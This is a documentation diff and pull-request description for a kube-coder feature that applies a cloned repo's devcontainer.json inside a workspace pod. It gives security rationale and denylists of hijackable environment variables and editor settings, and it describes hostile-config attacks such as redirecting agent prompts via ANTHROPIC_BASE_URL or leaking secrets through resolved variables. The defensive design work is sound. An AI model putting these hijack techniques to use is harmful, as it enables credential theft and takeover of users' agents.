+ports show up on the Apps page, VS Code extensions and settings reach
+code-server, `containerEnv`/`remoteEnv` reach the agents you dispatch, and the
+lifecycle commands are shown to you so you can run them with one click.
+
+Nothing is executed until you click Apply and read what will run.
+
+## What kube-coder does and does not do
+
+kube-coder **interprets** `devcontainer.json` inside the workspace pod you
+already have. It does **not** build a container from it, and it never will
+from here. Three constraints make that structural rather than a missing
+feature:
+
+| Constraint | Where it comes from | What it rules out |
+|---|---|---|
+| The pod runs as UID 1000 with `allowPrivilegeEscalation: false` | `templates/deployment.yaml` | `sudo` at runtime. The spec requires **features** to install as root at image-build time, so `features` can never work here. |
+| `build.mode` defaults to `kaniko` | `values.yaml` | No Docker daemon, so `image` and `build` have nothing to build with. |
+| One pod is one persistent home | architecture | A nested dev container would mean two filesystems, and code-server, tmux and your agents would each have to pick one. |
+
+So the feature spends as much effort on **reporting what cannot be applied** as
+on applying the rest. Every unsupported property comes back with a reason
+grounded in the constraint above and a remedy you can act on. Silently ignoring
+`features` would leave you with a workspace that *looks* configured and isn't —
+which is the worst possible outcome for something whose whole purpose is
+migration.
+
+### Applied
+
+| Property | How |
+|---|---|
+| `name` | Names a freshly-discovered project (never overwrites a name you chose) |
+| `workspaceFolder` | Mapped onto the project directory; anything that escapes it is refused |
+| `forwardPorts`, `portsAttributes` | Pinned on the **Apps** page with their labels |
+| `customizations.vscode.extensions` | Installed into code-server |
+| `customizations.vscode.settings` | Merged into code-server's `settings.json` |
+| `containerEnv`, `remoteEnv` | Added to the environment of new builds in that directory |
+| `onCreateCommand`, `updateContentCommand`, `postCreateCommand`, `postStartCommand` | Run on request, per hook, after you confirm |
+
+### Reported, not applied
+
+`image` · `build` · `features` · `dockerComposeFile` · `service` · `mounts` ·
+`runArgs` · `privileged` · `capAdd` · `securityOpt` · `hostRequirements` ·
+`initializeCommand` · `postAttachCommand` · `remoteUser` · `appPort` and a few
+others. Each shows in the Dev container card with its reason and remedy.
+
+The common case is `features`. The fix is usually mechanical: anything that
+installs into `$HOME` — nvm, pyenv, rustup, `pip --user`, `npm -g` with a
+user prefix — moves to `postCreateCommand` and works. Anything that needs to
+write to `/usr` has to go into the workspace image instead.
+
+## Using it
+
+The **Dev container** card appears in the project brief on `/cto` for any
+workdir that has a `devcontainer.json`. It shows what the file declares, what
+has already run, and what cannot be applied.
+
+Click **Apply…** and you get a dialog with:
+
+- everything that will be applied immediately (ports, extensions, settings, env);
+- the **exact text** of every lifecycle command, verbatim, with a checkbox each;
+- a warning on any command that needs root — those will fail, and it is better
+  to know before you wait fifteen minutes for it;
+- the blocking unsupported properties repeated at the top, so you never approve
+  a `postCreate` believing your `features` already installed.
+
+Every hook starts **unticked**. Applying ports, settings, extensions and env
+without running anything is one click.
+
+### Re-running after a pod restart
+
+`postStartCommand` is per-boot by definition. Tick **Re-run postStart after
+every pod restart** in the dialog and kube-coder will run it once on each boot
+— but only while `devcontainer.json` is byte-for-byte the file you consented
+to. Change the file and the automatic run stops until you confirm the new
+commands.
+
+`postCreateCommand` is **never** run automatically at boot. A ten-minute
+`npm ci` would delay every pod start, and restarting to escape a broken state
+would just re-trigger whatever broke it.
+
+## Safety
+
+`devcontainer.json` comes out of a cloned repo, so it is treated as hostile
+input throughout.
+
+- **Nothing executes on discovery.** Browsing projects, opening the brief, or
+  calling any GET only ever parses the file.
+- **Consent is pinned to the file.** The apply request must echo back the hash
+  of the exact file you were shown. If `devcontainer.json` changed in between —
+  a `git pull`, or a `postStart` rewriting its own config — the server refuses
+  with `409` instead of running text you never read.
+- **Commands run in their own process group** with a wall-clock timeout
+  (`devcontainer.commandTimeoutSeconds`, default 900s). On expiry the whole
+  group is killed, so a runaway `npm install` cannot outlive it.
+- **A non-zero exit stops the chain**, per the spec.
+- **Three denylists** reject repo-supplied values that would take over the
+  workspace regardless of whether any command runs:
+  - *environment* — `ANTHROPIC_*`, `OPENAI_*`, `GH_*`, `GITHUB_*`, `AWS_*`,
+    `PATH`, `LD_PRELOAD`, `BASH_ENV`, `GIT_SSH_COMMAND`, `NODE_OPTIONS` and
+    friends. `ANTHROPIC_BASE_URL` is the sharpest: a repo setting it would
+    silently proxy every agent prompt through an endpoint its author controls.
+    Your own provider keys always win over anything the file declares.
+  - *editor settings* — `terminal.integrated.profiles.*`,
+    `security.workspace.trust.*`, `remote.*`, `http.proxy*`, and anything
+    ending in `executablePath` / `interpreterPath` / `serverPath` /
+    `shellArgs`. These run a command on every editor open, silently, forever.
+  - *extension ids* — must be `publisher.name`. A `.vsix` path or a leading `-`
+    is refused, because `--install-extension` also accepts a filesystem path
+    and that would install arbitrary editor code straight out of the repo.
+- **`${localEnv:X}` is never resolved.** It would copy a workspace secret into
+  a value the repo chose the name of, which a later command could read back and
+  send anywhere. It is reported as an unresolved caveat instead.
+- **Nothing is clobbered.** A port you pinned by hand keeps your name; a
+  setting you edited in code-server survives a repo that disagrees.
+- **Read-only workspaces** (`READONLY_MODE=true`) reject both POST routes with
+  `403`, and the boot pass does not run.
+- **The CTO can look but not apply.** `list_devcontainers` and
+  `get_devcontainer` are exposed as MCP tools so an agent can explain your
+  environment; there is deliberately no apply tool. Approving repo-supplied
+  commands is a human's job — an agent's judgement is exactly what a malicious
+  `devcontainer.json` is trying to capture.
+
+## Two homes, one gotcha
+
+Lifecycle commands run with `HOME=/home/dev`, so `nvm`, `rustup` and
+`pip --user` install onto the persistent volume and survive a restart.
+
+Your **interactive** shells — the terminal, code-server, SSH — run with
+`HOME=/home/ubuntu`, which is rebuilt from skel on every boot. So a tool
+installed by `postCreateCommand` persists but may not be on your `PATH` in a
+fresh terminal. If a command reports success and the binary seems missing,
+that's why: look in `/home/dev/.nvm`, `/home/dev/.local/bin`, and add it to
+your shell rc.
+
+## JSONC
+
+`devcontainer.json` is JSON **with comments and trailing commas** — both legal,
+both present in almost every real file. kube-coder parses them, and reports
+syntax errors with a line and column that point at the original file.
+
+## Configuration
+
+```yaml
+devcontainer:
+  enabled: true                # DEVCONTAINER_ENABLED
+  autoApplyOnBoot: true        # DEVCONTAINER_AUTO_APPLY
+  commandTimeoutSeconds: 900   # DEVCONTAINER_TIMEOUT
+```
+
+`enabled: false` hides the Dev container card and 404s `/api/devcontainer*`.
+`autoApplyOnBoot: false` keeps the read-and-report surface but makes every
+command execution require an explicit click, always.
+
+## API
+
+| Verb | Path | Notes |
+|---|---|---|
+| `GET` | `/api/devcontainer?workdir=<abs>` | Parsed config, what was applied, per-hook status. A directory with no file answers **200 with `found: false`**, not 404. |
+| `GET` | `/api/devcontainer/scan` | Every workspace directory that has one, with counts. |
+| `POST` | `/api/devcontainer/apply` | `{workdir, hooks[], config_hash, auto_apply}`. `hooks: []` applies ports/settings/extensions/env and runs nothing. `config_hash` is **required** whenever `hooks` is non-empty. Answers `202`. |
+| `POST` | `/api/devcontainer/reset` | `{workdir, unpin_ports}`. Forgets that we applied here. Settings and extensions are not rolled back. |
+
+Errors: `400 hash_required`, `409 hash_mismatch`, `409 busy`, `404 not_found`,
+`422 invalid`.

--- a/docs/environment-variables.md
+++ b/docs/environment-variables.md
@@ -96,6 +96,13 @@ This document describes all environment variables used by kube-coder components.
 | `DASHBOARD_DIST_DIR` | `/opt/dashboard-dist` | Directory containing compiled dashboard assets. |
 | `DISPLAY` | `:99` | X11 display for browser/VNC sessions. |
 
+### devcontainer.json (#594)
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `DEVCONTAINER_ENABLED` | `true` | Read a repo's own `devcontainer.json`. `false` hides the Dev container card and 404s `/api/devcontainer*`. Set from `devcontainer.enabled`. |
+| `DEVCONTAINER_AUTO_APPLY` | `true` | Allow the once-per-boot `postStartCommand` pass. Still requires a per-workdir opt-in AND an unchanged config hash. `false` makes every command execution require an explicit click. Set from `devcontainer.autoApplyOnBoot`. |
+| `DEVCONTAINER_TIMEOUT` | `900` | Seconds one lifecycle command may run before its whole process group is killed. Set from `devcontainer.commandTimeoutSeconds`. |
+
 ## Workspace Controller (`controller.py`)
 
 ### Core Configuration


### PR DESCRIPTION
Closes #594.

If a repo comes from Codespaces, Coder, Ona or DevPod it already carries `.devcontainer/devcontainer.json`. We had nothing that read it — I checked, there are zero `devcontainer` references anywhere in the tree and no setup hook in `start.sh` — so anyone moving a project over had to rebuild their environment by hand. This reads the file they already have.

## Why it interprets the file instead of building a container

I looked at doing this properly (build the image the file describes) and it can't work here. Three things rule it out, and they're all load-bearing rather than "we didn't get to it":

- The pod runs as UID 1000 with `allowPrivilegeEscalation: false`, so `sudo` does nothing at runtime. The spec installs **`features` as root at image build time**. That's not a gap in this PR, it's structurally impossible in this pod.
- `build.mode` defaults to `kaniko`, so there's no Docker daemon. dind only exists under `build.mode: buildkit`.
- One pod is one persistent home. A nested dev container means two filesystems and code-server, tmux and the agents would each have to pick one.

So it applies what fits the pod we have: `forwardPorts`/`portsAttributes` become Apps pins, `customizations.vscode` extensions and settings go to code-server, `containerEnv`/`remoteEnv` reach new builds, and the four lifecycle hooks run on request.

Everything else — `image`, `build`, `features`, `dockerComposeFile`, `mounts`, `runArgs`, `privileged`, `capAdd`, `hostRequirements`, `initializeCommand`, `postAttachCommand`, `remoteUser`, `appPort` — is reported with the actual reason and a way forward, not silently dropped.

That second list is really the point of the feature. Quietly ignoring `features` gives you a workspace that *looks* configured and isn't, which is the worst thing that can happen to something whose whole job is migration. For `features` specifically the fix is usually mechanical: anything installing into `$HOME` (nvm, pyenv, rustup, `pip --user`) moves to `postCreateCommand` and just works. Only things that write to `/usr` are genuinely stuck, and those belong in the workspace image.

## Safety

This is a file out of a cloned repo, so I treated it as hostile throughout. We already have `instruction_scan.py` because cloned content is an injection vector here, and a devcontainer is a stronger one — it's direct execution, no agent to talk into it.

**Nothing runs on discovery.** Browsing projects, opening the brief, any GET — all parse-only.

**Consent is pinned to the file's hash.** The apply request has to echo back the hash of the exact file that was rendered in the dialog. Without that, a `git pull` between the dialog drawing and the user clicking OK means they approved command A and command B ran — and a `postStartCommand` rewriting its own config is the same attack from inside. Mismatch is a 409.

**Applying without running anything is the default.** `POST /apply` with `hooks: []` does ports, settings, extensions and env and executes nothing. Every hook checkbox in the dialog starts unticked.

**Commands are contained.** Own process group via `start_new_session=True`, killed with `killpg` on either a wall-clock timeout (default 900s) or a log cap. The process group matters: without it a runaway `npm install` spawns children that outlive the kill. The log cap matters because `/home/dev` is the PVC that memory, tasks and the project registry all sit on — filling it breaks far more than this one run.

**Three denylists**, and these earn their keep even in a deployment that never executes a lifecycle command:

- *env* — `ANTHROPIC_*`, `OPENAI_*`, `GH_*`, `GITHUB_*`, `AWS_*`, `PATH`, `LD_PRELOAD`, `BASH_ENV`, `GIT_SSH_COMMAND`, `NODE_OPTIONS` and friends. `ANTHROPIC_BASE_URL` is the sharp one — a repo setting it would silently proxy every agent prompt through an endpoint its author controls. Provider keys always win over anything the file declares, enforced by dropping conflicting devcontainer keys rather than relying on tmux `-e` ordering.
- *editor settings* — `terminal.integrated.profiles.*`, `security.workspace.trust.*`, `remote.*`, `http.proxy*`, anything ending `executablePath`/`interpreterPath`/`serverPath`/`shellArgs`. These run a command every time you open a terminal, silently, forever, long after you've forgotten the repo.
- *extension ids* — must be `publisher.name`. `--install-extension` also accepts a filesystem path, so a `.vsix` sitting in the repo tree would be arbitrary editor code execution, and a leading `-` would be read as a flag.

**`${localEnv:X}` is never resolved.** It would copy a workspace secret into a value the repo picked the name of, which a later command could read back and send anywhere. It's reported as an unresolved caveat with the literal token shown.

**Nothing gets clobbered.** A port you pinned by hand keeps your name and the collision is reported. A setting you edited in code-server survives a repo that disagrees — we only overwrite a key whose current value is exactly what we last wrote for it.

**The boot pass runs `postStart` only**, and needs three separate things: the chart flag, a per-workdir opt-in the user set explicitly, and a config hash still matching what they consented to. It never runs `postCreate` — a ten-minute `npm ci` would delay every pod start, and someone restarting to escape a broken state would just re-trigger whatever broke it.

`READONLY_MODE` 403s both POSTs through the existing `do_POST` chokepoint.

**MCP is read-only on purpose.** `list_devcontainers` and `get_devcontainer` let the CTO look at and explain an environment. There's deliberately no apply tool — approving repo-supplied commands should stay with a human, since an agent's judgement is exactly what a hostile config is trying to capture.

## How it's put together

Pure/impure split, same shape as `instruction_scan.py` and the skills model/syncer pair:

- **`charts/workspace/devcontainer.py`** (new) locates, parses, normalizes, classifies and hashes. It never imports `subprocess`. It's a separate module rather than more `server.py` because the parser wants ~40 unit tests that shouldn't need an HTTP server.
- **`DevcontainerManager`** in `server.py` owns everything that touches the workspace, because it needs `AppsManager`, `EventBroker` and `READONLY_MODE` — and a pure module importing `server` for those would be a cycle.

### JSONC

`devcontainer.json` is JSON *with comments and trailing commas*. Both are legal and both show up in nearly every real file, so `json.loads` fails on the common case. Two string-aware passes then stdlib json, no new dependency.

The bit worth reviewing: both passes preserve length and line count. A comment character becomes a space, a newline inside a block comment stays a newline. That means a `JSONDecodeError`'s line and column point into the *original* file, so "invalid at line 12, column 3" is actually true instead of off by however many characters we stripped.

### Invalidation

Content hash, never mtime. `git checkout` and a PVC restore both bump mtime with identical content, and a rebase can move it backwards.

Hashed **per hook** rather than per file, so editing `forwardPorts` doesn't mark a successful ten-minute `postCreate` as stale and re-prompt you to run it again.

`postStart` re-runs once per boot, keyed on a random token in `/tmp`. Since `/tmp` is container-local and wiped on restart it *is* a per-boot identity by construction. I deliberately didn't use `/proc/sys/kernel/random/boot_id` — that's the **node's** boot id, it survives a pod restart on the same node, and it would quietly mean `postStart` never runs again.

## One behaviour change to flag

`WorkspaceManager.PROJECT_MARKERS` gains the two devcontainer paths. That tuple feeds `ProjectsManager.discover()`'s auto-provision as well as the new-task picker, so **directories that were previously invisible now register themselves**.

That's intended — a `devcontainer.json` is somebody explicitly saying "this is a project", which is stronger evidence than a stray `Makefile`, so it counts toward `high` confidence. But it's user-visible and worth a changelog line, and there's an explicit test for it.

## Config

```yaml
devcontainer:
  enabled: true                # DEVCONTAINER_ENABLED
  autoApplyOnBoot: true        # DEVCONTAINER_AUTO_APPLY
  commandTimeoutSeconds: 900   # DEVCONTAINER_TIMEOUT
```

Wired with `dig`, not sprig `default` — `default` treats boolean `false` as empty, so `enabled: false` would silently come back as `true`. There's a chart test for exactly that case. No new container either, so `deployment_test.yaml`'s index-based `containers[0]` assertions stay valid, and that's asserted too.

## Testing

Whole-repo suites, all green: 1957 Python, 724 vitest across 93 files, 180 helm unittest across 21 suites, plus `tsc --noEmit` and `helm lint` clean.

New coverage breaks down as:

- **82 pure** — the comment and trailing-comma passes including markers inside string values, escaped quotes, unterminated block comments, BOM/CRLF/empty/non-object; all three denylists; per-hook hash isolation; boot-id invalidation.
- **53 applier and runner** — user pins and hand-edited settings not clobbered, extensions invoked as argv and never through a shell, `killpg` on timeout, chain stops on a non-zero exit, the consent gate, all the boot-pass conditions.
- **23 API** — `200 found:false` for a bare directory, the routes working with `cto_available()` False, `READONLY` 403s, disabled 404s.
- **9 registry integration**, **6 chart**, **38 frontend**.

## Known gaps

A few things I'd rather state than have someone find:

- **The two-HOME thing.** Hooks run with `HOME=/home/dev` so installs land on the PVC and persist, but interactive shells use `HOME=/home/ubuntu`, so a tool installed by `postCreate` can be invisible in a fresh terminal even though it's there. Documented in `docs/devcontainer.md`; a real fix (a declared marker path we can verify) is a follow-up.
- **Port pins are global by port**, so two repos both forwarding 3000 collide. The second is refused and reported rather than clobbering the first. No per-project namespacing in this version.
- **code-server settings are global, not per-folder.** Writing `<repo>/.vscode/settings.json` would be per-folder but it modifies the user's git tree, which seemed worse.
- **The log cap is a containment bound, not byte-exact.** The child writes to the file directly, so it can overshoot by roughly (write rate × the 0.25s poll interval). Piping every byte through a Python reader thread would bound it exactly but would also make the server the throughput bottleneck for every legitimate build — a bad trade for something whose job is stopping a runaway, not trimming a log. The code comment and the test name both say so rather than implying a hard limit.
